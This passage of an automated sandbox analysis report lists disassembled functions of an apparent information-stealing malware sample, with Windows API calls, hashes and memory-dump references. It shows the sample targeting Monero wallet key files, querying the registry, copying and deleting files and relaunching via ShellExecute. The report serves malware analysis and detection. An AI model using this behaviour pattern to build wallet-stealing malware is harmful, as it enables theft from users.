                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: 522568b4b093392474a38611c43c72f2d2ab3a57a4eb471e97897e49dd383336
                                • Instruction ID: c08d065d9b064a786198d4fce7a0cb2f567f21b405f52bb24203c41480468059
                                • Opcode Fuzzy Hash: 522568b4b093392474a38611c43c72f2d2ab3a57a4eb471e97897e49dd383336
                                • Instruction Fuzzy Hash: 0641BC76D00208E7DB14FBA4DC46FED737DA758700F404998B61996181EA755B88CBF2
                                Function 00B86920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 00B8696C
                                • sscanf.NTDLL ref: 00B86999
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B869B2
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B869C0
                                • ExitProcess.KERNEL32 ref: 00B869DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$System$File$ExitProcesssscanf
                                • String ID:
                                • API String ID: 2533653975-0
                                • Opcode ID: 1aa33bc3c9146ced3b05e7bdc7aed3e29cf3c4d23e1934c00875beedf9921959
                                • Instruction ID: 3233dd3550bb70bacd848f928e305b5c657f5ccf9fd827c5dbcfe35fad0023db
                                • Opcode Fuzzy Hash: 1aa33bc3c9146ced3b05e7bdc7aed3e29cf3c4d23e1934c00875beedf9921959
                                • Instruction Fuzzy Hash: C9219A75D14209EBCF04EFE8D945AEEB7B5FF48300F04856AE506E3250EB745605CBA5
                                Function 00B87E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B87E37
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B87E3E
                                • RegOpenKeyExA.ADVAPI32(80000002,0092BB60,00000000,00020119,?), ref: 00B87E5E
                                • RegQueryValueExA.ADVAPI32(?,0093D478,00000000,00000000,000000FF,000000FF), ref: 00B87E7F
                                • RegCloseKey.ADVAPI32(?), ref: 00B87E92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 9765fdf31b89199567e4e4c5444fa2e6e6756b0ca7c5f27f504a9de38497a1cd
                                • Instruction ID: d0e6dcf857824e30a0aa2ff5fde03e9a86e35d54081e03718dedc2dcd237c764
                                • Opcode Fuzzy Hash: 9765fdf31b89199567e4e4c5444fa2e6e6756b0ca7c5f27f504a9de38497a1cd
                                • Instruction Fuzzy Hash: 44112BB1A44305EBD704DB98DD89F6BBBB8EB04711F204299F605E6690DB7498018BA1
                                Function 00B89260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                Download Yara Rule
                                APIs
                                • StrStrA.SHLWAPI(0093DD58,?,?,?,00B8140C,?,0093DD58,00000000), ref: 00B8926C
                                • lstrcpyn.KERNEL32(00DBAB88,0093DD58,0093DD58,?,00B8140C,?,0093DD58), ref: 00B89290
                                • lstrlen.KERNEL32(?,?,00B8140C,?,0093DD58), ref: 00B892A7
                                • wsprintfA.USER32 ref: 00B892C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpynlstrlenwsprintf
                                • String ID: %s%s
                                • API String ID: 1206339513-3252725368
                                • Opcode ID: c95f0bd0fa87c039a645be40e8b6d2c944d3a1c214bc30c33afd04a90906c2e2
                                • Instruction ID: f22fe6f0d86cce21a163e1565ba757c411c57b0cbd6fe399946fd835b541a23a
                                • Opcode Fuzzy Hash: c95f0bd0fa87c039a645be40e8b6d2c944d3a1c214bc30c33afd04a90906c2e2
                                • Instruction Fuzzy Hash: 76011E75500208FFCB04DFECC988EAE7BB9EF44350F148288F90A9B300C631AA40DBA5
                                Function 00B712A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B712B4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B712BB
                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00B712D7
                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00B712F5
                                • RegCloseKey.ADVAPI32(?), ref: 00B712FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 608f9402d1162cc60f4f6758f557f6054d44e5042bf93ed892f5d47e1993ec13
                                • Instruction ID: 7ba4d30f353354874ed29eb377f933546fbbed73b4b4a9db98a8aaf77931cf69
                                • Opcode Fuzzy Hash: 608f9402d1162cc60f4f6758f557f6054d44e5042bf93ed892f5d47e1993ec13
                                • Instruction Fuzzy Hash: 4401C2B9A40308FBDB04DFD4DC59FAEB7B8EB48701F108155FA15D7280DA759A018B61
                                Function 00B8C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: d144431400925eb4b634f037c76627274e668b07e7464ad15968341341dfc045
                                • Instruction ID: d96c798e3de3a39b05e421aa789afc4a9b2b11611cf474aab31b7272f8fe16c6
                                • Opcode Fuzzy Hash: d144431400925eb4b634f037c76627274e668b07e7464ad15968341341dfc045
                                • Instruction Fuzzy Hash: 2A41F6B110075C5EDB269B24CD84FFB7FE8EB45704F1444E8E98A87192E2719A44CF30
                                Function 00B86630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00B86663
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00B86726
                                • ExitProcess.KERNEL32 ref: 00B86755
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                • String ID: <
                                • API String ID: 1148417306-4251816714
                                • Opcode ID: f08b562f075367bab57920530d283f8e88e01cd41f7bf6b3fb5cc5c452075447
                                • Instruction ID: 7f8eaccb2dabeba4478971bb687fb60adde30f595cfcdcae03fc6ba3cb6454ee
                                • Opcode Fuzzy Hash: f08b562f075367bab57920530d283f8e88e01cd41f7bf6b3fb5cc5c452075447
                                • Instruction Fuzzy Hash: 4731FDB1801218EBDB14FB54DC95BDD77B8AF44300F8051D9F209A61A1DF746B49CFA6
                                Function 00B887C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00B90E28,00000000,?), ref: 00B8882F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B88836
                                • wsprintfA.USER32 ref: 00B88850
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 35a3c239f71e7d8ab0547ac38e2e1a2e126a3fd91db10e18da5f4edadc900c2f
                                • Instruction ID: fe4913382369cb3ed62603f91c90cfa379f366ec181e61b24cb73df4e46e6daf
                                • Opcode Fuzzy Hash: 35a3c239f71e7d8ab0547ac38e2e1a2e126a3fd91db10e18da5f4edadc900c2f
                                • Instruction Fuzzy Hash: 362108B5A44208EBDB04DF98DD49FAEBBB8FB48701F104259F605E7790C779A9008BA1
                                Function 00B88D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00B8951E,00000000), ref: 00B88D5B
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B88D62
                                • wsprintfW.USER32 ref: 00B88D78
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesswsprintf
                                • String ID: %hs
                                • API String ID: 769748085-2783943728
                                • Opcode ID: c6ffe19638193ae432476b03f4ec5a2717dac469c4da5e4ad8fcd25ae696ba8d
                                • Instruction ID: d8820ff94c7ac2bb74fc454125d97be9909aeb5b78d39c7c3426855fcfb128a8
                                • Opcode Fuzzy Hash: c6ffe19638193ae432476b03f4ec5a2717dac469c4da5e4ad8fcd25ae696ba8d
                                • Instruction Fuzzy Hash: 54E046B4A40308FBCB00DB98DC0AA6977A8EB04702F000294F909C6780EA719A009BA2
                                Function 00B7A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                  • Part of subcall function 00B88B60: GetSystemTime.KERNEL32(00B90E1A,00939FD8,00B905AE,?,?,00B713F9,?,0000001A,00B90E1A,00000000,?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B88B86
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B7A2E1
                                • lstrlen.KERNEL32(00000000,00000000), ref: 00B7A3FF
                                • lstrlen.KERNEL32(00000000), ref: 00B7A6BC
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                • DeleteFileA.KERNEL32(00000000), ref: 00B7A743
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 27a89acac158722c53751f531dc5c662d8f885a882560a9230dc2fbfc3e00ba8
                                • Instruction ID: ef8459308cd9fab136665c5a9d52a7721d705fecf2f60d26fe123edb482e99e9
                                • Opcode Fuzzy Hash: 27a89acac158722c53751f531dc5c662d8f885a882560a9230dc2fbfc3e00ba8
                                • Instruction Fuzzy Hash: FCE1C6728101189BEB05FBA4DC91DEE737CAF54300F50859AF516B61B1EF346A49CB72
                                Function 00B7D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                  • Part of subcall function 00B88B60: GetSystemTime.KERNEL32(00B90E1A,00939FD8,00B905AE,?,?,00B713F9,?,0000001A,00B90E1A,00000000,?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B88B86
